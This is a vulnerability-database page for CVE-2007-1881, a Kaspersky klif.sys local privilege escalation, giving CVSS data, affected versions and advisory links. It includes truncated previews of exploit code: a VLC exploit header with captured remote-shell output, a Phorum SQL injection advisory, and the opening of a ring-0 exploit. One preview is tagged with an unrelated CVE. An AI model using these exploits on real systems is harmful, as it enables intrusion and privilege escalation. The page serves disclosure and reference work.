CVE-2007-1881
Published 2007-04-06
Priority P420 · medium · 6.8 (CVSS 2.0)
Vector: AV:L/AC:L/Au:S/C:C/I:C/A:C
EXPLOIT
EPSS: 0.67% (47.3th percentile)
Unspecified vulnerability in KLIF (klif.sys) in Kaspersky Anti-Virus, Anti-Virus for Workstations, and Anti-Virus for File Servers 6.0, and Internet Security 6.0 before Maintenance Pack 2 build 6.0.2.614 allows local users to gain Ring-0 privileges via unspecified vectors.
Affected
3 ranges
| Vendor | Product | Version range | Fixed in |
|---|---|---|---|
| kaspersky_lab | kaspersky_anti-virus | <= 6.0 | — |
| kaspersky_lab | kaspersky_anti-virus | — | — |
| kaspersky_lab | kaspersky_internet_security | <= 6.0.1.411 | — |
No detection rules found.
Exploit-DB
VideoLAN VLC Media Player 0.8.6d SSA Parsing Double Sh311 - Universal
exploitdb·2008-05-23·CVSS 7.5
CVE-2008-1881 [HIGH] VideoLAN VLC Media Player 0.8.6d SSA Parsing Double Sh311 - Universal
---
#!/usr/bin/python
#
# VLC 0.8.6d Double Sh311 Universal Exploit
# CVE-2007-6681
# Vulnerability Discovered by Michal Luczaj
#
# Coded by Muris Kurgas aka j0rgan http://www.jorgan.users.cg.yu/
# and
# Matteo Memelli aka ryujin http://www.be4mind.com - http://www.gray-world.net
# WE CODED IT JUST FOR FUN ;)
# Cheers to #offsec and all our friends :) and prelate_ hehe
#-----------------------------------------------------------------------------
#
# FIRST SHELL -> NORMAL RET OVERWRITE -> WE OWN EIP
#
# matte@badrobot:~$ telnet 192.168.1.245 4444
# Trying 192.168.1.245...
# Connected to 192.168.1.245.
# Escape character is '^]'.
# Microsoft Windows XP [Version 5.1.2600]
# (C) Copyright 1985-2001 Microsoft Corp.
#
# C:\
Exploit-DB
Phorum 5.1.20 - 'pm.php' Recipient Name SQL Injection
exploitdb·2007-04-23
CVE-2007-2339 Phorum 5.1.20 - 'pm.php' Recipient Name SQL Injection
---
source: https://www.securityfocus.com/bid/23616/info
Phorum is prone to multiple input-validation vulnerabilities, including an unauthorized-access issue, privilege-escalation issue, multiple SQL-injection issues, and cross-site scripting issues, because the application fails to sufficiently sanitize user-supplied input.
Exploiting these issues could allow an attacker to steal cookie-based authentication credentials, compromise the application, access or modify sensitive data, or exploit latent vulnerabilities in the underlying database implementation.
Phorum 5.1.20 is affected; prior versions may also be vulnerable.
Let's look at source code of "include/db/mysq.php" ~ line 1881 :
------------------[source code]--------------
Exploit-DB
Kaspersky AntiVirus 6.0 - Local Privilege Escalation
exploitdb·2007-01-15
CVE-2007-1881 Kaspersky AntiVirus 6.0 - Local Privilege Escalation
---
// kav 6.0 0day local priv escalation exploit
// by m4d
// http://unl0ck.net
#include
#include
#include
// r0-shellcode creates C:\Hello.txt with "Hello from ring-0! :)"
No writeups or analysis indexed.
http://secunia.com/advisories/24778
http://www.kaspersky.com/technews?id=203038693
http://www.kaspersky.com/technews?id=203038694
http://www.osvdb.org/33852
http://www.vupen.com/english/advisories/2007/1268
Published: 2007-04-06